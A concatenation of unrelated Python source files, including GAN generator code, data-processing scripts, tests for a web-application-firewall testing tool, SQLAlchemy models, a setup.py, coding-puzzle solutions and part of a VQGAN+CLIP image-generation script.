x = self.up_0(x, ft4)
x = self.up(x)
x = self.fadain_alpha(x, sft3, alpha=self.opt.alpha) if not self.opt.no_ss else x
x = self.up_1(x, ft3)
x = self.up(x)
x = self.fadain_alpha(x, sft2, alpha=self.opt.alpha) if not self.opt.no_ss else x
x = self.up_2(x, ft2)
x = self.up(x)
x = self.fadain_alpha(x, sft1, alpha=self.opt.alpha) if not self.opt.no_ss else x
x = self.up_3(x, ft1)
x = self.up(x)
if self.opt.num_upsampling_layers == 'most':
ft0 = self.up(ft0)
x = self.fadain_alpha(x, sft0, alpha=self.opt.alpha) if not self.opt.no_ss else x
x = self.up_4(x, ft0)
x = self.up(x)
x = self.conv_img(F.leaky_relu(x, 2e-1))
x = F.tanh(x)
return x
class Pix2PixHDGenerator(BaseNetwork):
@staticmethod
def modify_commandline_options(parser, is_train):
parser.add_argument('--resnet_n_downsample', type=int, default=4, help='number of downsampling layers in netG')
parser.add_argument('--resnet_n_blocks', type=int, default=9, help='number of residual blocks in the global generator network')
parser.add_argument('--resnet_kernel_size', type=int, default=3,
help='kernel size of the resnet block')
parser.add_argument('--resnet_initial_kernel_size', type=int, default=7,
help='kernel size of the first convolution')
parser.set_defaults(norm_G='instance')
return parser
def __init__(self, opt):
super().__init__()
input_nc = opt.label_nc + (1 if opt.contain_dontcare_label else 0) + (0 if opt.no_instance else 1)
norm_layer = get_norm_layer(opt, opt.norm_G)
activation = nn.ReLU(False)
model = []
# initial conv
model += [nn.ReflectionPad2d(opt.resnet_initial_kernel_size // 2),
norm_layer(nn.Conv2d(input_nc, opt.ngf,
kernel_size=opt.resnet_initial_kernel_size,
padding=0)),
activation]
# downsample
mult = 1
for i in range(opt.resnet_n_downsample):
model += [norm_layer(nn.Conv2d(opt.ngf * mult, opt.ngf * mult * 2,
kernel_size=3, stride=2, padding=1)),
activation]
mult *= 2
# resnet blocks
for i in range(opt.resnet_n_blocks):
model += [ResnetBlock(opt.ngf * mult,
norm_layer=norm_layer,
activation=activation,
kernel_size=opt.resnet_kernel_size)]
# upsample
for i in range(opt.resnet_n_downsample):
nc_in = int(opt.ngf * mult)
nc_out = int((opt.ngf * mult) / 2)
model += [norm_layer(nn.ConvTranspose2d(nc_in, nc_out,
kernel_size=3, stride=2,
padding=1, output_padding=1)),
activation]
mult = mult // 2
# final output conv
model += [nn.ReflectionPad2d(3),
nn.Conv2d(nc_out, opt.output_nc, kernel_size=7, padding=0),
nn.Tanh()]
self.model = nn.Sequential(*model)
def forward(self, input, z=None):
return self.model(input)
|
from tabulate import tabulate
entry1 = "* 1.0.192.0/18 157.130.10.233 0 701 38040 9737 i"
entry2 = "* 1.1.1.0/24 157.130.10.233 0 701 1299 15169 i"
entry3 = "* 1.1.42.0/24 157.130.10.233 0 701 9505 17408 2.1465 i"
entry4 = "* 1.0.192.0/19 157.130.10.233 0 701 6762 6762 6762 6762 38040 9737 i"
ent1 = entry4.split()
ent2 = entry1.split()
prefix = ent1[1]
asn = ent1[4:-1]
print tabulate([[prefix,asn]],headers=['Prefix','ASN'])
|
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict
# parent_path = os.path.realpath(os.pardir)
# if sys.platform.startswith('win') or sys.platform.startswith('cygwin'):
# seseds_path = os.path.join(parent_path, 'MCM-ICM-2018-Problem-C\\data\\csv\\seseds.csv')
# msncodes_path = os.path.join(parent_path, 'MCM-ICM-2018-Problem-C\\data\\csv\\msncodes.csv')
# elif sys.platform.startswith('darwin') or sys.platform.startswith('linux'):
# seseds_path = os.path.join(parent_path, 'MCM-ICM-2018-Problem-C/data/csv/seseds.csv')
# msncodes_path = os.path.join(parent_path, 'MCM-ICM-2018-Problem-C/data/csv/msncodes.csv')
# else:
# pass
seseds = pd.read_csv("C:\\Users\\THINKPAD\\PycharmProjects\\MCM-ICM-2018-Problem-C\\data\\csv\\seseds.csv", skiprows=None, engine='c', low_memory=True)
az_msn = []
az_state_code = []
az_year = []
az_data = []
ca_msn = []
ca_state_code = []
ca_year = []
ca_data = []
nm_msn = []
nm_state_code = []
nm_year = []
nm_data = []
tx_msn = []
tx_state_code = []
tx_year = []
tx_data = []
for i in range(len(seseds["MSN"])):
if re.search("AZ", seseds["StateCode"][i]):
az_msn.append(seseds["MSN"][i])
az_state_code.append(seseds["StateCode"][i])
az_year.append(seseds["Year"][i])
az_data.append(seseds["Data"][i])
if re.search("CA", seseds["StateCode"][i]):
ca_msn.append(seseds["MSN"][i])
ca_state_code.append(seseds["StateCode"][i])
ca_year.append(seseds["Year"][i])
ca_data.append(seseds["Data"][i])
if re.search("NM", seseds["StateCode"][i]):
nm_msn.append(seseds["MSN"][i])
nm_state_code.append(seseds["StateCode"][i])
nm_year.append(seseds["Year"][i])
nm_data.append(seseds["Data"][i])
if re.search("TX", seseds["StateCode"][i]):
tx_msn.append(seseds["MSN"][i])
tx_state_code.append(seseds["StateCode"][i])
tx_year.append(seseds["Year"][i])
tx_data.append(seseds["Data"][i])
az_comp_data = OrderedDict()
ca_comp_data = OrderedDict()
nm_comp_data = OrderedDict()
tx_comp_data = OrderedDict()
item_dict = OrderedDict()
item_dict["MSN"] = az_msn
item_dict["StateCode"] = az_state_code
item_dict["Year"] = az_year
item_dict["Data"] = az_data
az_comp_data = pd.DataFrame(item_dict)
az_comp_data.to_csv("C:/Users/THINKPAD/PycharmProjects/MCM-ICM-2018-Problem-C/data/csv/az_data.csv", index=False, index_label=False, sep=',')
item_dict["MSN"] = ca_msn
item_dict["StateCode"] = ca_state_code
item_dict["Year"] = ca_year
item_dict["Data"] = ca_data
ca_comp_data = pd.DataFrame(item_dict)
ca_comp_data.to_csv("C:/Users/THINKPAD/PycharmProjects/MCM-ICM-2018-Problem-C/data/csv/ca_data.csv", index=False, index_label=False, sep=',')
item_dict["MSN"] = nm_msn
item_dict["StateCode"] = nm_state_code
item_dict["Year"] = nm_year
item_dict["Data"] = nm_data
nm_comp_data = pd.DataFrame(item_dict)
nm_comp_data.to_csv("C:/Users/THINKPAD/PycharmProjects/MCM-ICM-2018-Problem-C/data/csv/nm_data.csv", index=False, index_label=False, sep=',')
item_dict["MSN"] = tx_msn
item_dict["StateCode"] = tx_state_code
item_dict["Year"] = tx_year
item_dict["Data"] = tx_data
tx_comp_data = pd.DataFrame(item_dict)
tx_comp_data.to_csv("C:/Users/THINKPAD/PycharmProjects/MCM-ICM-2018-Problem-C/data/csv/tx_data.csv", index=False, index_label=False, sep=',')
|
result = 0
with open('input.txt') as fp:
line = fp.readline()
while line:
result += (int(line)//3) - 2
line = fp.readline()
print(str(result))
|
import os
import uuid
import filecmp
import BaseHTTPServer
import threading
import functools
from ftw_compatible_tool import base
from ftw_compatible_tool import context
from ftw_compatible_tool import broker
from ftw_compatible_tool import database
from ftw_compatible_tool import traffic
import common
def warning_as_error(*args):
raise ValueError(*args)
def test_commands_dispatch():
class Trigger(object):
def __init__(self):
self.count = 0
def expect(self, expected):
self.expected = expected
def __call__(self, target):
assert(target == self.expected)
self.count += 1
ctx = context.Context(broker.Broker())
ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
t = Trigger()
conf = base.BaseConf(functions={
"test_func1": t,
"test_func2": t,
})
bs = base.Base(ctx, conf)
t.expect(1)
bs._command("test_func1", 1)
t.expect(2)
bs._command("test_func2", 2)
assert(t.count == 2)
def test_load_and_gen_packets():
class FixUUID(object):
def __init__(self):
self.number = 0
def __call__(self):
self.number += 1
return uuid.UUID(int=self.number - 1)
old_uuid1 = uuid.uuid1
uuid.uuid1 = FixUUID()
ctx = context.Context(broker.Broker(), traffic.Delimiter("magic"))
ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
conf = base.BaseConf()
bs = base.Base(ctx, conf)
database.Sqlite3DB(ctx)
packets_yaml = os.path.join(
os.path.dirname(__file__), "data", "packets.yaml")
bs._load_yaml_tests(packets_yaml)
bs._gen_requests()
packets_pkt = conf.pkt_path
expect_pkt = os.path.join(
os.path.dirname(__file__), "data", "packets.pkt")
assert(filecmp.cmp(packets_pkt, expect_pkt))
uuid.uuid1 = old_uuid1
def test_start_experiment():
counter = {
"request" : 0,
}
def check_result(row, result):
assert(functools.reduce(lambda x, y: x and y, result.values()))
counter["request"] += 1
with common.HTTPServerInstance():
ctx = context.Context(broker.Broker(), traffic.Delimiter("magic"))
ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
conf = base.BaseConf()
bs = base.Base(ctx, conf)
ctx.broker.subscribe(broker.TOPICS.CHECK_RESULT, check_result)
traffic.RawRequestCollector(ctx)
traffic.RawResponseCollector(ctx)
traffic.RealTrafficCollector(ctx)
database.Sqlite3DB(ctx)
packets_yaml = os.path.join(
os.path.dirname(__file__), "data", "packets.yaml")
bs._load_yaml_tests(packets_yaml)
bs._gen_requests()
assert(bs._start_experiment("localhost:" + str(common._PORT)) == 0)
bs._report_experiment()
assert(counter["request"] == 2)
def test_import_log():
class LogCheck(object):
def __init__(self, expected_log):
if os.path.exists(expected_log):
with open(expected_log, "r") as fd:
self.expected_log = iter(fd.readlines())
else:
self.expected_log = iter([expected_log])
def __call__(self, line):
assert(line == next(self.expected_log))
def finish(self):
try:
next(self.expected_log)
return False
except StopIteration:
return True
ctx = context.Context(broker.Broker())
ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
conf = base.BaseConf()
bs = base.Base(ctx, conf)
lc = LogCheck("test log")
ctx.broker.subscribe(broker.TOPICS.RAW_LOG, lc)
bs._import_log("test log")
ctx.broker.unsubscribe(broker.TOPICS.RAW_LOG, lc)
assert(lc.finish())
lc = LogCheck(__file__)
ctx.broker.subscribe(broker.TOPICS.RAW_LOG, lc)
bs._import_log(__file__)
ctx.broker.unsubscribe(broker.TOPICS.RAW_LOG, lc)
assert(lc.finish())
def test_result_report():
class FakeQueryResult(object):
def __init__(self, data):
self.data = iter(data)
def __iter__(self):
for i in self.data:
yield i
def title(self):
return (
"traffic_id",
"test_title",
"output",
"raw_request",
"raw_response",
"raw_log"
)
class ResultChecker(object):
def __init__(self, brk, test_data, expected):
self.test_data = iter(test_data)
self.expected = iter(expected)
brk.subscribe(broker.TOPICS.SQL_COMMAND, self.publish_data)
brk.subscribe(broker.TOPICS.CHECK_RESULT, self.check)
def publish_data(self, *args, **kwargs):
if "callback" in kwargs:
kwargs["callback"](FakeQueryResult(self.test_data))
def check(self, row, result):
assert(result == next(self.expected))
def finish(self):
try:
next(self.expected)
return False
except StopIteration:
return True
ctx = context.Context(broker.Broker())
# ctx.broker.subscribe(broker.TOPICS.WARNING, warning_as_error)
conf = base.BaseConf()
bs = base.Base(ctx, conf)
test_data = (
(
(
"", "", "", "", "", ""
),
{}
),
(
(
"1", "1", "{'status' : 403}", "", "HTTP1.1 403", ""
),
{"status": True}
),
(
(
"1", "1", "{'status' : 403}", "", "HTTP1.1 200", ""
),
{"status": False}
),
(
(
"1", "1", "{'status' : [200, 404]}", "", "HTTP1.1 200", ""
),
{"status": True}
),
(
(
"1", "1", "{'log_contains' : 'a\da'}", "", "", "abcde"
),
{"log_contains": False}
),
(
(
"1", "1", "{'log_contains' : 'a\da'}", "", "", "ab[a1a]cde"
),
{"log_contains": True}
),
(
(
"1", "1", "{'no_log_contains' : 'a\da'}", "", "", "ab[a1a]cde"
),
{"no_log_contains": False}
),
(
(
"1", "1", "{'no_log_contains' : 'a\da'}", "", "", "abcdef"
),
{"no_log_contains": True}
),
(
(
"1", "1", "{'response_contains' : 'a\da'}", "", "abcdef", ""
),
{"response_contains": False}
),
(
(
"1", "1", "{'response_contains' : 'a\da'}", "", "ab[a1a]cde", ""
),
{"response_contains": True}
),
(
(
"1", "1", "{'expect_error' : True}", "", "abcdef", ""
),
{"expect_error": False}
),
(
(
"1", "1", "{'expect_error' : True}", "", "", ""
),
{"expect_error": True}
),
)
rc = ResultChecker(
ctx.broker,
[v[0] for v in test_data],
[v[1] for v in test_data])
bs._report_experiment()
assert(rc.finish())
|
def digits_product(product):
import operator
import functools
num = product
num_ls = []
digits = [9, 8, 7, 6, 5, 4, 3, 2]
cont = 1
if product < 10:
return 10 + product
counter = 0
while cont == 1:
breaker = 0
counter += 1
for i in digits:
if num%i == 0:
num_ls.append(i)
num /= i
breaker = 1
break
if functools.reduce(operator.mul, num_ls, 1) == product:
num_ls.reverse()
return int("".join(str(i) for i in num_ls))
if breaker == 0:
return -1
cont = 0
|
from sqlalchemy import create_engine, Table, Column, Integer, String, Float
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
engine = create_engine('sqlite:///database.db')
Session = sessionmaker(bind=engine)
session = Session()
Base = declarative_base()
class Query(Base):
__tablename__ = "query"
id = Column(Integer, primary_key=True, nullable=False)
query_name = Column(String(255), nullable=False)
def __init__(self, query):
self.query_name = query
def save(self):
session.add(self)
session.commit()
@staticmethod
def get_by_query(query):
data = session.query(Query).filter(Query.query_name.like("%{}%".format(query))).first()
if data is not None:
result = {
"id": data.id,
"query": data.query_name,
"details": Details.get_by_query_id(data.id)
}
else:
result = None
return result
class Details(Base):
__tablename__ = "details"
id = Column(Integer, primary_key=True, nullable=False)
author = Column(String(255), nullable=False)
title = Column(String(1028), nullable=False)
url = Column(String(1028), nullable=False)
year = Column(String(1028), nullable=False)
score = Column(Float, nullable=False)
query_id = Column(Integer, nullable=False)
def __init__(self, author, title, url, year, score, query_id):
self.author = author
self.title = title
self.url = url
self.year = year
self.score = score
self.query_id = query_id
def save(self):
session.add(self)
session.commit()
@staticmethod
def get_by_query_id(query_id):
data = session.query(Details).filter_by(query_id=query_id).all()
result = list()
for x in data:
obj = {
"id": x.id,
"author": x.author,
"title": x.title,
"url": x.url,
"year": x.year,
"score": x.score,
"query_id": x.query_id
}
result.append(obj)
return result
|
#
# Copyright (c) 2019-present, Prometheus Research, LLC
#
from setuptools import setup, find_packages
setup(
name="rex.notebook",
version="1.0.0",
description="Jupyter Notebook integration for Rex Applications",
long_description=open("README.rst", "r").read(),
maintainer="Prometheus Research, LLC",
maintainer_email="contact@prometheusresearch.com",
license="Apache-2.0",
package_dir={"": "src"},
packages=find_packages("src"),
namespace_packages=["rex"],
install_requires=[
"rex.core",
"rex.db",
"notebook == 6.0.0",
"nbformat == 4.4.0",
"nbconvert == 5.6.0",
"nbstripout == 0.3.6",
"pandas == 1.0.4",
"matplotlib == 3.1.1",
"ipykernel == 5.1.2",
"jupyter_client == 5.3.1",
"papermill == 1.2.0",
],
entry_points={"rex.ctl": ["rex = rex.notebook.ctl"]},
dependency_links=["https://dist.rexdb.org/packages/"],
rex_init="rex.notebook",
)
|
dic = {'orange':20, 'apple':100}
print(dic.get('orange'))
print(dic.get('orange', 70))
#print(dic.get('berry', 50))
print(dic.setdefault('berry', 50))
print(dic)
|
#######################################
# Created by Alessandro Bigiotti
# import API_KEY from my_scopus file
from my_scopus import MY_API_KEY
#####################################################################################################################################
# POSSIBLE LINK FOR QUERY SEARCH
# for all possible link see the documentation: elseiver developer portal
# search from Scopus API
scopus_api_search = "http://api.elsevier.com/content/search/scopus?"
# search from ScienceDirect API
science_direct_search = "http://api.elsevier.com/content/search/scidir?"
####################################
# POSSIBLE LINK TO Scopus API
# retrieve abstract information
abstract_retrieval = "http://api.elsevier.com/content/abstract/scopus_id/"
# example: http://api.elsevier.com/content/abstract/scopus_id/xxxxxxxxxxx?field=field1,field2&apikey=xxxxxxxx
# retrieve author information
author_retrieval = "http://api.elsevier.com/content/author/author_id/"
# example: http://api.elsevier.com/content/author/author_id/xxxxxxxxxxx?field=field1,field2&apikey=xxxxxxxx
# retrieve affiliation information
affiliation_retrieval = "http://api.elsevier.com/content/affiliation/eid/"
# example: http://api.elsevier.com/content/affiliation/eid/xxxxxxxxxxx?field=field1,field2&apikey=xxxxxxxx
#####################################################################################
#POSSIBLE LINK TO Science Direct API
#link to retrieve article information by pii
article_retrieve_by_pii = "http://api.elsevier.com/content/article/pii/"
# link to retrieve article recommended information by pii
article_recommendation_by_pii = "http://api.elsevier.com/content/article/recommendation/pii/"
################################################################################
# HEADERS OF THE QUERY
headers = dict()
headers['X-ELS-APIKey'] = MY_API_KEY # your API_KEY
headers['X-ELS-ResourceVersion'] = 'XOCS' # response type
headers['Accept'] = 'application/json' # application type
|
import numpy
class WordExtractor:
def __init__(self, sample):
""" Computes noise threshold using given sample """
avg = numpy.average(numpy.absolute(sample))
self.noise_threshold = avg
def detect_words(self, rate, data, hint = 0):
noise_array = self.__detect_noise(rate, data)
self.__smooth_noise(rate, noise_array)
return self.__split_words(rate, data, noise_array, hint)
# detect sample as noise if average in previous or following 20/40/60ms
# is above noise threshold
# use dynamic programming to speed up the process
# returns array of 0s and 1s depending if sample is classified as noise
def __detect_noise(self, rate, data):
noise = []
window_size = 2 * rate / 100 # number of samples in 20ms
n = len(data)
dp_left = [[0, 0, 0] for x in range(0, n)]
dp_left_len = [[0, 0, 0] for x in range(0, n)]
dp_right = [[0, 0, 0] for x in range(0, n)]
dp_right_len = [[0, 0, 0] for x in range(0, n)]
for i in range(1, n):
for j in range(0, 3):
dp_left[i][j] = dp_left[i - 1][j] + numpy.absolute(data[i - 1])
dp_left_len[i][j] = dp_left_len[i - 1][j] + 1
if i - (j + 1) * window_size > 0:
dp_left[i][j] -= numpy.absolute(
data[i - (j + 1) * window_size - 1])
dp_left_len[i][j] -= 1
for i in reversed(range(0, n - 1)):
for j in range(0, 3):
dp_right[i][j] = dp_right[i + 1][j] + numpy.absolute(
data[i + 1])
dp_right_len[i][j] = dp_left_len[i + 1][j] + 1
if i + (j + 1) * window_size < n - 1:
dp_right[i][j] -= numpy.absolute(
data[i + (j + 1) * window_size + 1])
dp_right_len[i][j] -= 1
for i in range(0, n):
if i > 0:
avg_before = 0
for j in range(0, 3):
avg_before = max(avg_before,
float(dp_left[i][j]) / float(dp_left_len[i][j]))
else:
avg_before = 0
if i < n - 1:
avg_after = 0
for j in range(0, 3):
avg_after = max(avg_after,
float(dp_right[i][j]) / float(dp_right_len[i][j]))
else:
avg_after = 0
if max(avg_before, avg_after) > self.noise_threshold:
noise.append(1)
else:
noise.append(0)
return noise
# performs smoothing of noise array, decides to switch from silence to
# noise for some interval smaller then 200ms if there is at least 3 times
# larger noise interval before or after and at least the same on the other
# side
def __smooth_noise(self, rate, noise):
window_size = 2 * rate / 10 # number of samples in 200ms
n = len(noise)
i = 0
while i < n:
if noise[i] == 0:
j = i
while j + 1 < n and noise[j + 1] == 0:
j += 1
if j - i + 1 < window_size:
left_i = i - 1
while left_i - 1 >= 0 and noise[left_i - 1] == 1:
left_i -= 1
right_j = j + 1
while right_j + 1 < n and noise[right_j + 1] == 1:
right_j += 1
this_len = j - i + 1
left_len = i - left_i
right_len = right_j - j
if (min(left_len, right_len) >= this_len and
max(left_len, right_len) >= 3 * this_len):
for k in range(i, j + 1):
noise[k] = 1
i = right_j + 1
else:
i = j + 1
else:
i += 1
# extract words depending on array of 0s and 1s
# word must be longer then 100ms
# if hint for number of words is passed, select that many words with
# highest standard deviation or more if there is no significant drop
def __split_words(self, rate, data, noise, hint):
words = []
min_word_length = rate / 10 # number of samples in 100ms
last = []
stds = []
for i in range(0, len(data)):
if noise[i] == 1:
last.append(data[i])
continue
if len(last) >= min_word_length:
words.append(last)
stds.append(numpy.std(last))
last = []
if len(last) >= min_word_length:
words.append(last)
stds.append(numpy.std(last))
if hint == 0:
std_threshold = 0.25 * numpy.average(stds)
return self.__filter_with_threshold(words, stds, std_threshold)
else:
return self.__filter_with_hint(words, stds, hint)
# filter some words using computed standard deviation limit
def __filter_with_threshold(self, words, stds, std_threshold):
ret = []
for word, std in zip(words, stds):
if std > std_threshold:
ret.append(word)
return ret
# filter using given hint for number of words
# expect drop less than 10% to take more than hint
def __filter_with_hint(self, words, stds, hint):
stds.sort(reverse = True)
if hint >= len(stds):
return words
limit = hint
avg = numpy.average(stds[0 : hint])
threshold = 0.95 * (stds[hint - 1] / avg)
while limit < len(stds) and stds[limit] / avg > threshold:
limit += 1
if limit == len(stds):
return words
threshold = (stds[limit - 1] + stds[limit]) / 2.0
ret = []
for word, std in zip(words, stds):
if std > threshold:
ret.append(word)
return ret
|
# import sys
# N, K = map(int, input().split())
# lst = [int(sys.stdin.readline()) for _ in range(N)]
# lst.sort()
#
# start = 1
# end = max(lst)
# answer = 0
# while (start<=end) :
# count = 0
# mid = (start+end)//2
# for i in range(N) :
# mid = int((mid/10)*10)
# count += (lst[i]//mid)
# if (count>=K) :
# start = mid+1
# answer = mid
#
# else :
# end = mid-1
# print(answer)
X, Y = map(int, input().split())
Z = (int((int(Y) / int(X)) * 100))
start = 1
end = X
ans = 0
while(start <= end) :
if (X == Y) :
ans = -1
mid = (start+end)//2
if(int((int(Y+mid)/int(X+mid)) * 100)) == Z :
start = mid+1
else :
end = mid-1
ans = int((int(Y + mid) / int(X + mid)) * 100)
if (ans == Z) :
print(-1)
else :
print(mid)
|
gifts = input().split(' ')
while True:
command = input().split(' ')
if (' '.join(command)) == 'No Money':
break
else:
if command[0] == 'OutOfStock':
gifts[:] = [None if x == command[1] else x for x in gifts]
elif command[0] == 'Required':
if 0 <= int(command[2]) < len(gifts):
gifts[int(command[2])] = command[1]
elif command[0] == 'JustInCase':
gifts[len(gifts)-1] = command[1]
gifts = [i for i in gifts if i]
print(' '.join(gifts))
|
# Originally made by Katherine Crowson (https://github.com/crowsonkb, https://twitter.com/RiversHaveWings)
# The original BigGAN+CLIP method was by https://twitter.com/advadnoun
# Adapted from https://github.com/nerdyrodent/VQGAN-CLIP/blob/main/generate.py
import argparse
import os
import random
from urllib.request import urlopen
import imageio
import numpy as np
from pydantic import BaseModel
from tqdm import tqdm
import torch
from torch.nn import functional as F
from torchvision import transforms
from torchvision.transforms import functional as TF
from torch.cuda import get_device_properties
torch.backends.cudnn.benchmark = False # NR: True is a bit faster, but can lead to OOM. False is more deterministic.
#torch.use_deterministic_algorithms(True) # NR: grid_sampler_2d_backward_cuda does not have a deterministic implementation
from PIL import ImageFile, Image, PngImagePlugin, ImageChops
ImageFile.LOAD_TRUNCATED_IMAGES = True
from subprocess import Popen, PIPE
import re
from model.utils import *
IMAGE_SIZE = 128
class Args(BaseModel):
prompts: str = None
image_prompts: list = []
size: list = [IMAGE_SIZE, IMAGE_SIZE]
init_image: str = None
init_noise: str = None
init_weight: float = 0.
clip_model: str = "ViT-B/32"
vqgan_config: str = "model/checkpoints/vqgan_imagenet_f16_16384.yaml"
vqgan_checkpoint: str = "model/checkpoints/vqgan_imagenet_f16_16384.yaml"
noise_prompt_seeds: list = []
noise_prompt_weights: list = []
step_size: float = 0.1
cut_method: str = "latest"
cutn: int = 32
cut_pow: float = 1.
seed: int = None
optimiser: str = "Adam"
output: str = "output.png"
make_video: bool = False
make_zoom_video: bool = False
zoom_start: int = 0
zoom_frequency: int = 10
zoom_scale: float = 0.99
zoom_shift_x: int = 0
zoom_shift_y: int = 0
prompt_frequency: int = 0
video_length: float = 10.
output_video_fps: float = 0.
input_video_fps: float = 15.
cudnn_determinism: bool = False
augments: list = []
video_style_dir: str = None
cuda_device: str = "cuda:0"
def load_model(cuda_device=0, vqgan_config="model/checkpoints/vqgan_imagenet_f16_16384.yaml", vqgan_checkpoint="model/checkpoints/vqgan_imagenet_f16_16384.ckpt"):
device = torch.device(cuda_device)
return load_vqgan_model(vqgan_config, vqgan_checkpoint, gumbel=False).to(device)
def load_perceptor(cuda_device=0, clip_model="ViT-B/32"):
device = torch.device(cuda_device)
jit = True if float(torch.__version__[:3]) < 1.8 else False
return clip.load(clip_model, jit=jit)[0].eval().requires_grad_(False).to(device)
def generate(
model,
perceptor,
output_path="output.png",
cuda_device="cuda:0",
prompts=None,
iterations=500,
save_every=500,
size=[IMAGE_SIZE, IMAGE_SIZE],
gumbel=False,
):
# Create the parser
vq_parser = argparse.ArgumentParser(description='Image generation using VQGAN+CLIP')
# Add the arguments
vq_parser.add_argument("-p", "--prompts", type=str, help="Text prompts", default=None, dest='prompts')
vq_parser.add_argument("-ip", "--image_prompts", type=str, help="Image prompts / target image", default=[], dest='image_prompts')
vq_parser.add_argument("-s", "--size", nargs=2, type=int, help="Image size (width height) (default: %(default)s)", default=[IMAGE_SIZE,IMAGE_SIZE], dest='size')
vq_parser.add_argument("-ii", "--init_image", type=str, help="Initial image", default=None, dest='init_image')
vq_parser.add_argument("-in", "--init_noise", type=str, help="Initial noise image (pixels or gradient)", default=None, dest='init_noise')
vq_parser.add_argument("-iw", "--init_weight", type=float, help="Initial weight", default=0., dest='init_weight')
vq_parser.add_argument("-m", "--clip_model", type=str, help="CLIP model (e.g. ViT-B/32, ViT-B/16)", default='ViT-B/32', dest='clip_model')
vq_parser.add_argument("-conf", "--vqgan_config", type=str, help="VQGAN config", default=f'checkpoints/vqgan_imagenet_f16_16384.yaml', dest='vqgan_config')
vq_parser.add_argument("-ckpt", "--vqgan_checkpoint", type=str, help="VQGAN checkpoint", default=f'checkpoints/vqgan_imagenet_f16_16384.ckpt', dest='vqgan_checkpoint')
vq_parser.add_argument("-nps", "--noise_prompt_seeds", nargs="*", type=int, help="Noise prompt seeds", default=[], dest='noise_prompt_seeds')
vq_parser.add_argument("-npw", "--noise_prompt_weights", nargs="*", type=float, help="Noise prompt weights", default=[], dest='noise_prompt_weights')
vq_parser.add_argument("-lr", "--learning_rate", type=float, help="Learning rate", default=0.1, dest='step_size')
vq_parser.add_argument("-cutm", "--cut_method", type=str, help="Cut method", choices=['original','updated','nrupdated','updatedpooling','latest'], default='latest', dest='cut_method')
vq_parser.add_argument("-cuts", "--num_cuts", type=int, help="Number of cuts", default=32, dest='cutn')
vq_parser.add_argument("-cutp", "--cut_power", type=float, help="Cut power", default=1., dest='cut_pow')
vq_parser.add_argument("-sd", "--seed", type=int, help="Seed", default=None, dest='seed')
vq_parser.add_argument("-opt", "--optimiser", type=str, help="Optimiser", choices=['Adam','AdamW','Adagrad','Adamax','DiffGrad','AdamP','RAdam','RMSprop'], default='Adam', dest='optimiser')
vq_parser.add_argument("-o", "--output", type=str, help="Output filename", default="output.png", dest='output')
vq_parser.add_argument("-vid", "--video", action='store_true', help="Create video frames?", dest='make_video')
vq_parser.add_argument("-zvid", "--zoom_video", action='store_true', help="Create zoom video?", dest='make_zoom_video')
vq_parser.add_argument("-zs", "--zoom_start", type=int, help="Zoom start iteration", default=0, dest='zoom_start')
vq_parser.add_argument("-zse", "--zoom_save_every", type=int, help="Save zoom image iterations", default=10, dest='zoom_frequency')
vq_parser.add_argument("-zsc", "--zoom_scale", type=float, help="Zoom scale %", default=0.99, dest='zoom_scale')
vq_parser.add_argument("-zsx", "--zoom_shift_x", type=int, help="Zoom shift x (left/right) amount in pixels", default=0, dest='zoom_shift_x')
vq_parser.add_argument("-zsy", "--zoom_shift_y", type=int, help="Zoom shift y (up/down) amount in pixels", default=0, dest='zoom_shift_y')
vq_parser.add_argument("-cpe", "--change_prompt_every", type=int, help="Prompt change frequency", default=0, dest='prompt_frequency')
vq_parser.add_argument("-vl", "--video_length", type=float, help="Video length in seconds (not interpolated)", default=10, dest='video_length')
vq_parser.add_argument("-ofps", "--output_video_fps", type=float, help="Create an interpolated video (Nvidia GPU only) with this fps (min 10. best set to 30 or 60)", default=0, dest='output_video_fps')
vq_parser.add_argument("-ifps", "--input_video_fps", type=float, help="When creating an interpolated video, use this as the input fps to interpolate from (>0 & <ofps)", default=15, dest='input_video_fps')
vq_parser.add_argument("-d", "--deterministic", action='store_true', help="Enable cudnn.deterministic?", dest='cudnn_determinism')
vq_parser.add_argument("-aug", "--augments", nargs='+', action='append', type=str, choices=['Ji','Sh','Gn','Pe','Ro','Af','Et','Ts','Cr','Er','Re'], help="Enabled augments (latest vut method only)", default=[], dest='augments')
vq_parser.add_argument("-vsd", "--video_style_dir", type=str, help="Directory with video frames to style", default=None, dest='video_style_dir')
vq_parser.add_argument("-cd", "--cuda_device", type=str, help="Cuda device to use", default="cuda:0", dest='cuda_device')
# Execute the parse_args() method
# args = vq_parser.parse_args()
args = Args()
if not prompts and not args.image_prompts:
raise Exception("No prompt received")
if args.cudnn_determinism:
torch.backends.cudnn.deterministic = True
if not args.augments:
args.augments = [['Af', 'Pe', 'Ji', 'Er']]
# Split text prompts using the pipe character (weights are split later)
if prompts:
# For stories, there will be many phrases
story_phrases = [phrase.strip() for phrase in prompts.split("^")]
# Make a list of all phrases
all_phrases = []
for phrase in story_phrases:
all_phrases.append(phrase.split("|"))
# First phrase
prompts = all_phrases[0]
# Split target images using the pipe character (weights are split later)
if args.image_prompts:
args.image_prompts = args.image_prompts.split("|")
args.image_prompts = [image.strip() for image in args.image_prompts]
if args.make_video and args.make_zoom_video:
print("Warning: Make video and make zoom video are mutually exclusive.")
args.make_video = False
# Make video steps directory
if args.make_video or args.make_zoom_video:
if not os.path.exists('steps'):
os.mkdir('steps')
# Fallback to CPU if CUDA is not found and make sure GPU video rendering is also disabled
# NB. May not work for AMD cards?
if not args.cuda_device == 'cpu' and not torch.cuda.is_available():
args.cuda_device = 'cpu'
args.video_fps = 0
print("Warning: No GPU found! Using the CPU instead. The iterations will be slow.")
print("Perhaps CUDA/ROCm or the right pytorch version is not properly installed?")
# If a video_style_dir has been, then create a list of all the images
if args.video_style_dir:
print("Locating video frames...")
video_frame_list = []
for entry in os.scandir(args.video_style_dir):
if (entry.path.endswith(".jpg")
or entry.path.endswith(".png")) and entry.is_file():
video_frame_list.append(entry.path)
# Reset a few options - same filename, different directory
if not os.path.exists('steps'):
os.mkdir('steps')
args.init_image = video_frame_list[0]
filename = os.path.basename(args.init_image)
cwd = os.getcwd()
output_path = os.path.join(cwd, "steps", filename)
num_video_frames = len(video_frame_list) # for video styling
device = torch.device(cuda_device)
# clock=deepcopy(perceptor.visual.positional_embedding.data)
